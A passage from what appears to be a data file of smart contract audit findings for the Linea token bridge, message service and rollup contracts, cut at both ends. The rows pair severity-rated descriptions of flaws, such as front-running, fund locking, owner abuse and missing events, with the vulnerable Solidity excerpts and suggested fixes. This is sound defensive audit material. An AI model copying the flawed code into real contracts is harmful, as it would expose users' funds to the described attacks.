so that future calls to `delegateTokens` always revert.,,"```\\nfunction withdrawTokens(address to, uint256 amount) external onlyController {\\n TransferHelper.withdrawTokens(token, to, amount);\\n if (IERC20(token).balanceOf(address(this)) == 0) selfdestruct;\\n}\\n```\\n" +Balance of msg.sender Is Used Instead of the from Address,low,"The `TransferHelper` library has methods that allow transferring tokens directly or on behalf of a different wallet that previously approved the transfer. Those functions also check the sender balance before conducting the transfer. In the second case, where the transfer happens on behalf of someone the code is checking not the actual token spender balance, but the `msg.sender` balance instead.\\n```\\nfunction transferTokens(\\n address token,\\n address from,\\n address to,\\n uint256 amount\\n) internal {\\n uint256 priorBalance = IERC20(token).balanceOf(address(to));\\n require(IERC20(token).balanceOf(msg.sender) >= amount, 'THL01');\\n```\\n",Use the `from` parameter instead of `msg.sender`.,,"```\\nfunction transferTokens(\\n address token,\\n address from,\\n address to,\\n uint256 amount\\n) internal {\\n uint256 priorBalance = IERC20(token).balanceOf(address(to));\\n require(IERC20(token).balanceOf(msg.sender) >= amount, 'THL01');\\n```\\n" +Bridge Token Would Be Locked and Cannot Bridge to Native Token,high,"If the bridge token B of a native token A is already deployed and `confirmDeployment` is called on the other layer and `setDeployed` sets A's `nativeToBridgedToken` value to `DEPLOYED_STATUS`. The bridge token B cannot bridge to native token A in `completeBridging` function, because A's `nativeToBridgedToken` value is not `NATIVE_STATUS`, as a result the native token won't be transferred to the receiver. 
User's bridge token will be locked in the original layer\\n```\\nif (nativeMappingValue == NATIVE\\_STATUS) {\\n // Token is native on the local chain\\n IERC20(\\_nativeToken).safeTransfer(\\_recipient, \\_amount);\\n} else {\\n bridgedToken = nativeMappingValue;\\n if (nativeMappingValue == EMPTY) {\\n // New token\\n bridgedToken = deployBridgedToken(\\_nativeToken, \\_tokenMetadata);\\n bridgedToNativeToken[bridgedToken] = \\_nativeToken;\\n nativeToBridgedToken[\\_nativeToken] = bridgedToken;\\n }\\n BridgedToken(bridgedToken).mint(\\_recipient, \\_amount);\\n}\\n```\\n\\n```\\nfunction setDeployed(address[] memory \\_nativeTokens) external onlyMessagingService fromRemoteTokenBridge {\\n address nativeToken;\\n for (uint256 i; i < \\_nativeTokens.length; i++) {\\n nativeToken = \\_nativeTokens[i];\\n nativeToBridgedToken[\\_nativeTokens[i]] = DEPLOYED\\_STATUS;\\n emit TokenDeployed(\\_nativeTokens[i]);\\n }\\n}\\n```\\n","Add an condition `nativeMappingValue` = `DEPLOYED_STATUS` for native token transfer in `confirmDeployment`\\n```\\nif (nativeMappingValue == NATIVE_STATUS || nativeMappingValue == DEPLOYED_STATUS) {\\n IERC20(_nativeToken).safeTransfer(_recipient, _amount);\\n```\\n",,"```\\nif (nativeMappingValue == NATIVE\\_STATUS) {\\n // Token is native on the local chain\\n IERC20(\\_nativeToken).safeTransfer(\\_recipient, \\_amount);\\n} else {\\n bridgedToken = nativeMappingValue;\\n if (nativeMappingValue == EMPTY) {\\n // New token\\n bridgedToken = deployBridgedToken(\\_nativeToken, \\_tokenMetadata);\\n bridgedToNativeToken[bridgedToken] = \\_nativeToken;\\n nativeToBridgedToken[\\_nativeToken] = bridgedToken;\\n }\\n BridgedToken(bridgedToken).mint(\\_recipient, \\_amount);\\n}\\n```\\n" +User Cannot Withdraw Funds if Bridging Failed or Delayed Won't Fix,high,"If the bridging failed due to the single coordinator is down, censoring the message, or bridge token contract is set to a bad or wrong contract address by `setCustomContract`, user's funds 
will stuck in the `TokenBridge` contract until coordinator is online or stop censoring, there is no way to withdraw the deposited funds\\n```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n","Add withdraw functionality to let user withdraw the funds under above circumstances or at least add withdraw functionality for Admin (admin can send the funds to the user manually), ultimately decentralize coordinator and sequencer to reduce bridging failure risk.",,"```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n" +"Bridges Don't Support Multiple Native Tokens, Which May Lead to Incorrect Bridging",high,"Currently, the system design does not support the scenarios where native tokens with the same addresses (which is possible with the same deployer and nonce) on different layers can be bridged.\\nFor instance, Let's consider, there is a native token `A` on `L1` which has already been bridged on `L2`. 
If anyone tries to bridge native token `B` on `L2` with the same address as token `A` , instead of creating a new bridge on `L1` and minting new tokens, the token bridge will transfer native token `A` on `L1` to the `_recipient` which is incorrect.\\nThe reason is the mappings don't differentiate between the native tokens on two different Layers.\\n```\\n mapping(address => address) public nativeToBridgedToken;\\n mapping(address => address) public bridgedToNativeToken;\\n```\\n\\n```\\nfunction completeBridging(\\n address \\_nativeToken,\\n uint256 \\_amount,\\n address \\_recipient,\\n bytes calldata \\_tokenMetadata\\n) external onlyMessagingService fromRemoteTokenBridge {\\n address nativeMappingValue = nativeToBridgedToken[\\_nativeToken];\\n address bridgedToken;\\n\\n if (nativeMappingValue == NATIVE\\_STATUS) {\\n // Token is native on the local chain\\n IERC20(\\_nativeToken).safeTransfer(\\_recipient, \\_amount);\\n } else {\\n```\\n",Redesign the approach to handle the same native tokens on different layers. One possible approach could be to define the set of mappings for each layer.,,```\\n mapping(address => address) public nativeToBridgedToken;\\n mapping(address => address) public bridgedToNativeToken;\\n```\\n +No Check for Initializing Parameters of TokenBridge,high,"In `TokenBridge` contract's `initialize` function, there is no check for initializing parameters including `_securityCouncil`, `_messageService`, `_tokenBeacon` and `_reservedTokens`. 
If any of these addresses is set to 0 or other invalid value, `TokenBridge` would not work, users may lose funds.\\n```\\nfunction initialize(\\n address \\_securityCouncil,\\n address \\_messageService,\\n address \\_tokenBeacon,\\n address[] calldata \\_reservedTokens\\n) external initializer {\\n \\_\\_Pausable\\_init();\\n \\_\\_Ownable\\_init();\\n setMessageService(\\_messageService);\\n tokenBeacon = \\_tokenBeacon;\\n for (uint256 i = 0; i < \\_reservedTokens.length; i++) {\\n setReserved(\\_reservedTokens[i]);\\n }\\n \\_transferOwnership(\\_securityCouncil);\\n}\\n```\\n","Add non-zero address check for `_securityCouncil`, `_messageService`, `_tokenBeacon` and `_reservedTokens`",,"```\\nfunction initialize(\\n address \\_securityCouncil,\\n address \\_messageService,\\n address \\_tokenBeacon,\\n address[] calldata \\_reservedTokens\\n) external initializer {\\n \\_\\_Pausable\\_init();\\n \\_\\_Ownable\\_init();\\n setMessageService(\\_messageService);\\n tokenBeacon = \\_tokenBeacon;\\n for (uint256 i = 0; i < \\_reservedTokens.length; i++) {\\n setReserved(\\_reservedTokens[i]);\\n }\\n \\_transferOwnership(\\_securityCouncil);\\n}\\n```\\n" +Owner Can Update Arbitrary Status for New Native Token Without Confirmation,high,"The function `setCustomContract` allows the owner to update arbitrary status for new native tokens without confirmation, bypassing the bridge protocol.\\nIt can set `DEPLOYED_STATUS` for a new native token, even if there exists no bridged token for it.\\nIt can set `NATIVE_STATUS` for a new native token even if it's not.\\nIt can set `RESERVED_STATUS` disallowing any new native token to be bridged.\\n```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, 
\\_targetContract);\\n}\\n```\\n",The function should not allow `_targetContract` to be any state code,,"```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n" +Owner May Exploit Bridged Tokens,high,"The function `setCustomContract` allows the owner, to define a custom ERC20 contract for the native token. However, it doesn't check whether the target contract has already been defined as a bridge to a native token or not. As a result, the owner may take advantage of the design flaw and bridge another new native token that has not been bridged yet, to an already existing target(already a bridge for another native token). Now, if a user tries to bridge this native token, the token bridge on the source chain will take the user's tokens, and instead of deploying a new bridge on the destination chain, tokens will be minted to the `_recipient` on an existing bridge defined by the owner, or it can be any random EOA address to create a DoS.\\nThe owner can also try to front-run calls to `completeBridging` for new Native Tokens on the destination chain, by setting a different bridge via `setCustomContract`. 
Although, the team states that the role will be controlled by a multi-sig which makes frontrunning less likely to happen.\\n```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n\\n```\\n} else {\\n bridgedToken = nativeMappingValue;\\n if (nativeMappingValue == EMPTY) {\\n // New token\\n bridgedToken = deployBridgedToken(\\_nativeToken, \\_tokenMetadata);\\n bridgedToNativeToken[bridgedToken] = \\_nativeToken;\\n nativeToBridgedToken[\\_nativeToken] = bridgedToken;\\n }\\n BridgedToken(bridgedToken).mint(\\_recipient, \\_amount);\\n}\\n```\\n","Make sure, a native token should bridge to a single target contract. A possible approach could be to check whether the `bridgedToNativeToken` for a target is `EMPTY` or not. If it's not `EMPTY`, it means it's already a bridge for a native token and the function should revert. The same can be achieved by adding the modifier `isNewToken(_targetContract)`.\\nNote:- However, it doesn't resolve the issue of frontrunning, even if the likelihood is less.",,"```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n" +Updating Message Service Does Not Emit Event,medium,"Resolution\\nThe recommendations are implemented by the Linea team in the pull request 69 with the final commit hash as `1fdd5cfc51c421ad9aaf8b2fd2b3e2ed86ffa898`\\nThe function `setMessageService` allows the owner to update the message service address. However, it does not emit any event reflecting the change. 
As a result, in case the owner gets compromised, it can silently add a malicious message service, exploiting users' funds. Since there was no event emitted, off-chain monitoring tools wouldn't be able to trigger alarms and users would continue using the rogue message service until and unless tracked manually.\\n```\\nfunction setMessageService(address \\_messageService) public onlyOwner {\\n messageService = IMessageService(\\_messageService);\\n}\\n```\\n",Consider emitting an event reflecting the update from the old message service to the new one.,,```\\nfunction setMessageService(address \\_messageService) public onlyOwner {\\n messageService = IMessageService(\\_messageService);\\n}\\n```\\n +Lock Solidity Version in pragma,low,"Contracts should be deployed with the same compiler version they have been tested with. Locking the pragma helps ensure that contracts do not accidentally get deployed using, for example, the latest compiler which may have higher risks of undiscovered bugs. Contracts may also be deployed by others and the pragma indicates the compiler version intended by the original authors.\\nSee Locking Pragmas in Ethereum Smart Contract Best Practices.\\n```\\npragma solidity ^0.8.19;\\n```\\n\\n```\\npragma solidity ^0.8.19;\\n```\\n\\n```\\npragma solidity ^0.8.19;\\n```\\n\\n```\\npragma solidity ^0.8.19;\\n```\\n",Lock the Solidity version to the latest version before deploying the contracts to production.\\n```\\npragma solidity 0.8.19;\\n```\\n,,```\\npragma solidity ^0.8.19;\\n```\\n +TokenBridge Does Not Follow a 2-Step Approach for Ownership Transfers,low,"Resolution\\nThe recommendations are implemented by the Linea team in the pull request 71 with the final commit hash as `8ebfd011675ea318b7067af52637192aa1126acd`\\n`TokenBridge` defines a privileged role Owner, however, it uses a single-step approach, which immediately transfers the ownership to the new address. 
If accidentally passed an incorrect address, the current owner will immediately lose control over the system as there is no fail-safe mechanism.\\nA safer approach would be to first propose the ownership to the new owner, and let the new owner accept the proposal to be the new owner. It will add a fail-safe mechanism for the current owner as in case it proposes ownership to an incorrect address, it will not immediately lose control, and may still propose again to a correct address.\\n```\\ncontract TokenBridge is ITokenBridge, PausableUpgradeable, OwnableUpgradeable {\\n```\\n",Consider moving to a 2-step approach for the ownership transfers as recommended above. Note:- Openzeppelin provides another helper utility as Ownable2StepUpgradeable which follows the recommended approach,,"```\\ncontract TokenBridge is ITokenBridge, PausableUpgradeable, OwnableUpgradeable {\\n```\\n" +"Heavy Blocks May Affect Block Finalization, if the Gas Requirement Exceeds Block Gas Limit",high,"The `sequencer` takes care of finalizing blocks by submitting proof, blocks' data, proof type, and parent state root hash. The team mentions that the blocks are finalized every 12s, and under general scenarios, the system will work fine. However, in cases where there are blocks containing lots of transactions and event logs, the function may require gas more than the block gas limit. 
As a consequence, it may affect block finalization or lead to a potential DoS.\\n```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n```\\n",We advise the team to benchmark the cost associated per block for the finalization and how many blocks can be finalized in one rollup and add the limits accordingly for the prover/sequencer.,,"```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n```\\n" +Postman Can Incorrectly Deliver a Message While Still Collecting the Fees,high,"The message service allows cross chain message delivery, where the user can define the parameters of the message as:\\nfrom: Sender of the message _to: Receiver of the message _fee: The fees, the sender wants to pay to the postman to deliver the message valueSent: The value in the native currency of the chain to be sent with the message messageNumber: Nonce value which increments for every message _calldata: Calldata for the message to be executed on the destination chain\\nThe postman estimates the gas before claiming/delivering the message on the destination chain, thus avoiding scenarios where the fees sent are less than the cost of claiming the message.\\nHowever, there is nothing that restricts the postman from sending the gas equal to the fees paid by the user. Although it contributes to the MEV, where the postman can select the messages with higher fees first and deliver them prior to others, it also opens up an opportunity where the postman can deliver a message incorrectly while still claiming the fees.\\nOne such scenario is, where the low-level call to target `_to` makes another sub-call to another address, let's say `x`. Let's assume, the `_to` address doesn't check, whether the call to address `x` was successful or not. 
Now, if the postman supplies a gas, which makes the top-level call succeed, but the low-level call to `x` fails silently, the postman will still be retrieving the fees of claiming the message, even though the message was not correctly delivered.\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n","Another parameter can be added to the message construct giving the user the option to define the amount of gas required to complete a transaction entirely. Also, a check can be added while claiming the message, to make sure the gas supplied by the postman is sufficient enough compared to the gas defined/demanded by the user. The cases, where the user can demand a huge amount of gas, can be simply avoided by doing the gas estimation, and if the demanded gas is more than the supplied fees, the postman will simply opt not to deliver the message",,"```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n" +User's Funds Would Stuck if the Message Claim Failed on the Destination Layer,high,"When claiming the message on the destination layer, if the message failed to execute with various reasons (e.g. 
wrong target contract address, wrong contract logic, out of gas, malicious contract), the Ether sent with `sendMessage` on the original layer will be stuck, although the message can be retried later by the Postman or the user (could fail again)\\n```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n",Add refund mechanism to refund users funds if the message failed to deliver on the destination layer,,"```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n" +Front Running finalizeBlocks When Sequencers Are Decentralized,high,"When sequencer is decentralized in the future, one sequencer could front run another sequencer's `finalizeBlocks` transaction, without doing the actual proving and sequencing, and steal the reward for sequencing if there is one. 
Once the frontrunner's `finalizeBlocks` is executed, the original sequencer's transaction would fail as `currentL2BlockNumber` would increment by one and state root hash won't match, as a result the original sequencer's sequencing and proving work will be wasted.\\n```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n if (stateRootHashes[currentL2BlockNumber] != \\_parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n }\\n\\n \\_finalizeBlocks(\\_blocksData, \\_proof, \\_proofType, \\_parentStateRootHash, true);\\n}\\n```\\n","Add the sequencer's address as one parameters in `_finalizeBlocks` function, and include the sequencer's address in the public input hash of the proof in verification function `_verifyProof`.\\n```\\nfunction _finalizeBlocks(\\n BlockData[] calldata _blocksData,\\n bytes memory _proof,\\n uint256 _proofType,\\n bytes32 _parentStateRootHash,\\n bool _shouldProve,\\n address _sequencer\\n )\\n```\\n\\n```\\n_verifyProof(\\n uint256(\\n keccak256(\\n abi.encode(\\n keccak256(abi.encodePacked(blockHashes)),\\n firstBlockNumber,\\n keccak256(abi.encodePacked(timestampHashes)),\\n keccak256(abi.encodePacked(hashOfRootHashes)),\\n keccak256(abi.encodePacked(_sequencer)\\n )\\n )\\n ) % MODULO_R,\\n _proofType,\\n _proof,\\n _parentStateRootHash\\n );\\n```\\n",,"```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n if (stateRootHashes[currentL2BlockNumber] != \\_parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n }\\n\\n 
\\_finalizeBlocks(\\_blocksData, \\_proof, \\_proofType, \\_parentStateRootHash, true);\\n}\\n```\\n" +User Funds Would Stuck if the Single Coordinator Is Offline or Censoring Messages,high,"When user sends message from L1 to L2, the coordinator needs to post the messages to L2, this happens in the anchoring message(addL1L2MessageHashes) on L2, then the user or Postman can claim the message on L2. since there is only a single coordinator, if the coordinator is down or censoring messages sent from L1 to L2, users funds can stuck in L1, until the coordinator come back online or stops censoring the message, as there is no message cancel feature or message expire feature. Although the operator can pause message sending on L1 once the coordinator is down, but if the message is sent and not posted to L2 before the pause it will still stuck.\\n```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n\\n```\\nfunction addL1L2MessageHashes(bytes32[] calldata \\_messageHashes) external onlyRole(L1\\_L2\\_MESSAGE\\_SETTER\\_ROLE) {\\n uint256 messageHashesLength = \\_messageHashes.length;\\n\\n if (messageHashesLength > 100) {\\n revert MessageHashesListLengthHigherThanOneHundred(messageHashesLength);\\n }\\n\\n for (uint256 i; i < messageHashesLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n if (inboxL1L2MessageStatus[messageHash] == INBOX\\_STATUS\\_UNKNOWN) {\\n inboxL1L2MessageStatus[messageHash] = INBOX\\_STATUS\\_RECEIVED;\\n }\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessageHashesAddedToInbox(\\_messageHashes);\\n}\\n```\\n",Decentralize coordinator and sequencer or enable user cancel or drop the message if message deadline has expired.,,"```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, 
\\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n" +Changing Verifier Address Doesn't Emit Event,high,"In function `setVerifierAddress`, after the verifier address is changed, there is no event emitted, which means if the operator (security council) changes the verifier to a buggy verifier, or if the security council is compromised, the attacker can change the verifier to a malicious one, the unsuspecting user would still use the service, potentially lose funds due to the fraud transactions would be verified.\\n```\\nfunction setVerifierAddress(address \\_newVerifierAddress, uint256 \\_proofType) external onlyRole(DEFAULT\\_ADMIN\\_ROLE) {\\n if (\\_newVerifierAddress == address(0)) {\\n revert ZeroAddressNotAllowed();\\n }\\n verifiers[\\_proofType] = \\_newVerifierAddress;\\n}\\n```\\n","Emits event after changing verifier address including old verifier address, new verifier address and the caller account",,"```\\nfunction setVerifierAddress(address \\_newVerifierAddress, uint256 \\_proofType) external onlyRole(DEFAULT\\_ADMIN\\_ROLE) {\\n if (\\_newVerifierAddress == address(0)) {\\n revert ZeroAddressNotAllowed();\\n }\\n verifiers[\\_proofType] = \\_newVerifierAddress;\\n}\\n```\\n" +L2 Blocks With Incorrect Timestamp Could Be Finalized,medium,"In `_finalizeBlocks` of `ZkEvmV2`, the current block timestamp `blockInfo.l2BlockTimestamp` should be greater or equal than the last L2 block timestamp and less or equal than the L1 block timestamp when `_finalizeBlocks` is executed. 
However the first check is missing, blocks with incorrect timestamp could be finalized, causing unintended system behavior\\n```\\nif (blockInfo.l2BlockTimestamp >= block.timestamp) {\\n revert BlockTimestampError();\\n}\\n```\\n",Add the missing timestamp check,,```\\nif (blockInfo.l2BlockTimestamp >= block.timestamp) {\\n revert BlockTimestampError();\\n}\\n```\\n +Rate Limiting Affecting the Usability and User's Funds Safety,medium,"In `claimMessage` of `L1MessageService` and `sendMessage` function of `L1MessageService` contract, function `_addUsedAmount` is used to rate limit the Ether amount (1000 Eth) sent from L2 to L1 in a time period (24 hours), this is problematic, usually user sends the funds to L1 when they need to exit from L2 to L1 especially when some security issues happened affecting their funds safety on L2, if there is a limit, the limit can be reached quickly by some whale sending large amount of Ether to L1, while other users cannot withdraw their funds to L1, putting their funds at risk. 
In addition, the limit can only be set and changed by the security council and security council can also pause message service at any time, blocking user withdraw funds from L2, this makes the L2->L1 message service more centralized.\\n```\\n\\_addUsedAmount(\\_fee + \\_value);\\n```\\n\\n```\\n\\_addUsedAmount(msg.value);\\n```\\n\\n```\\nfunction \\_addUsedAmount(uint256 \\_usedAmount) internal {\\n uint256 currentPeriodAmountTemp;\\n\\n if (currentPeriodEnd < block.timestamp) {\\n // Update period before proceeding\\n currentPeriodEnd = block.timestamp + periodInSeconds;\\n currentPeriodAmountTemp = \\_usedAmount;\\n } else {\\n currentPeriodAmountTemp = currentPeriodAmountInWei + \\_usedAmount;\\n }\\n\\n if (currentPeriodAmountTemp > limitInWei) {\\n revert RateLimitExceeded();\\n }\\n\\n currentPeriodAmountInWei = currentPeriodAmountTemp;\\n}\\n```\\n",Remove rate limiting for L2->L1 message service,,```\\n\\_addUsedAmount(\\_fee + \\_value);\\n```\\n +Front Running claimMessage on L1 and L2,medium,"The front-runner on L1 or L2 can front run the `claimMessage` transaction, as long as the `fee` is greater than the gas cost of the claiming the message and `feeRecipient` is not set, consequently the `fee` will be transferred to the message.sender(the front runner) once the message is claimed. As a result, postman would lose the incentive to deliver(claim) the message on the destination layer.\\n```\\nif (\\_fee > 0) {\\n address feeReceiver = \\_feeRecipient == address(0) ? msg.sender : \\_feeRecipient;\\n (bool feePaymentSuccess, ) = feeReceiver.call{ value: \\_fee }("""");\\n if (!feePaymentSuccess) {\\n revert FeePaymentFailed(feeReceiver);\\n }\\n```\\n\\n```\\nif (\\_fee > 0) {\\n address feeReceiver = \\_feeRecipient == address(0) ? 
msg.sender : \\_feeRecipient;\\n (bool feePaymentSuccess, ) = feeReceiver.call{ value: \\_fee }("""");\\n if (!feePaymentSuccess) {\\n revert FeePaymentFailed(feeReceiver);\\n }\\n}\\n```\\n",There are a few protections against front running including flashbots service. Another option to mitigate front running is to avoid using msg.sender and have user use the signed `claimMessage` transaction by the Postman to claim the message on the destination layer,,"```\\nif (\\_fee > 0) {\\n address feeReceiver = \\_feeRecipient == address(0) ? msg.sender : \\_feeRecipient;\\n (bool feePaymentSuccess, ) = feeReceiver.call{ value: \\_fee }("""");\\n if (!feePaymentSuccess) {\\n revert FeePaymentFailed(feeReceiver);\\n }\\n```\\n" +Contracts Not Well Designed for Upgrades,medium,"Inconsistent Storage Layout\\nThe Contracts introduce some buffer space in the storage layout to cope with the scenarios where new storage variables can be added if a need exists to upgrade the contracts to a newer version. This helps in reducing the chances of potential storage collisions. However, the storage layout concerning the buffer space is inconsistent, and multiple variations have been observed.\\n`PauseManager`, `RateLimitter`, and `MessageServiceBase` adds a buffer space of 10, contrary to other contracts which define the space as 50.\\n```\\nuint256[10] private \\_gap;\\n```\\n\\n```\\nuint256[10] private \\_gap;\\n```\\n\\n```\\nuint256[10] private \\_\\_base\\_gap;\\n```\\n\\n`L2MessageService` defines the buffer space prior to its existing storage variables.\\n```\\nuint256[50] private \\_\\_gap\\_L2MessageService;\\n```\\n\\nIf there exists a need to inherit from this contract in the future, the derived contract has to define the buffer space first, similar to `L2MessageService`. If it doesn't, `L2MessageService` can't have more storage variables. If it adds them, it will collide with the derived contract's storage slots.\\n2. 
`RateLimiter` and `MessageServiceBase` initializes values without the modifier `onlyInitializing`\\n```\\nfunction \\_\\_RateLimiter\\_init(uint256 \\_periodInSeconds, uint256 \\_limitInWei) internal {\\n```\\n\\n```\\nfunction \\_init\\_MessageServiceBase(address \\_messageService, address \\_remoteSender) internal {\\n```\\n\\nThe modifier `onlyInitializing` makes sure that the function should only be invoked by a function marked as `initializer`. However, it is absent here, which means these are normal internal functions that can be utilized in any other function, thus opening opportunities for errors.","Define a consistent storage layout. Consider a positive number `n` for the number of buffer space slots, such that, it is equal to any arbitrary number `d - No. of occupied storage slots`. For instance, if the arbitrary number is 50, and the contract has 20 occupied storage slots, the buffer space can be 50-20 = 30. It will maintain a consistent storage layout throughout the inheritance hierarchy.\\nFollow a consistent approach to defining buffer space. 
Currently, all the contracts, define the buffer space after their occupied storage slots, so it should be maintained in the `L2MessageService` as well.\\nDefine functions `__RateLimiter_init` and `_init_MessageServiceBase` as `onlyInitializing`.",,```\\nuint256[10] private \\_gap;\\n```\\n +Potential Code Corrections,low,"Function `_updateL1L2MessageStatusToReceived` and `addL1L2MessageHashes` allows status update for already received/sent/claimed messages.\\n```\\nfunction \\_updateL1L2MessageStatusToReceived(bytes32[] memory \\_messageHashes) internal {\\n uint256 messageHashArrayLength = \\_messageHashes.length;\\n\\n for (uint256 i; i < messageHashArrayLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n uint256 existingStatus = outboxL1L2MessageStatus[messageHash];\\n\\n if (existingStatus == INBOX\\_STATUS\\_UNKNOWN) {\\n revert L1L2MessageNotSent(messageHash);\\n }\\n\\n if (existingStatus != OUTBOX\\_STATUS\\_RECEIVED) {\\n outboxL1L2MessageStatus[messageHash] = OUTBOX\\_STATUS\\_RECEIVED;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessagesReceivedOnL2(\\_messageHashes);\\n}\\n```\\n\\n```\\nfunction addL1L2MessageHashes(bytes32[] calldata \\_messageHashes) external onlyRole(L1\\_L2\\_MESSAGE\\_SETTER\\_ROLE) {\\n uint256 messageHashesLength = \\_messageHashes.length;\\n\\n if (messageHashesLength > 100) {\\n revert MessageHashesListLengthHigherThanOneHundred(messageHashesLength);\\n }\\n\\n for (uint256 i; i < messageHashesLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n if (inboxL1L2MessageStatus[messageHash] == INBOX\\_STATUS\\_UNKNOWN) {\\n inboxL1L2MessageStatus[messageHash] = INBOX\\_STATUS\\_RECEIVED;\\n }\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessageHashesAddedToInbox(\\_messageHashes);\\n```\\n\\nIt may trigger false alarms, as they will still be a part of `L1L2MessagesReceivedOnL2` and `L1L2MessageHashesAddedToInbox`.\\n`_updateL1L2MessageStatusToReceived` checks the status of L1->L2 messages 
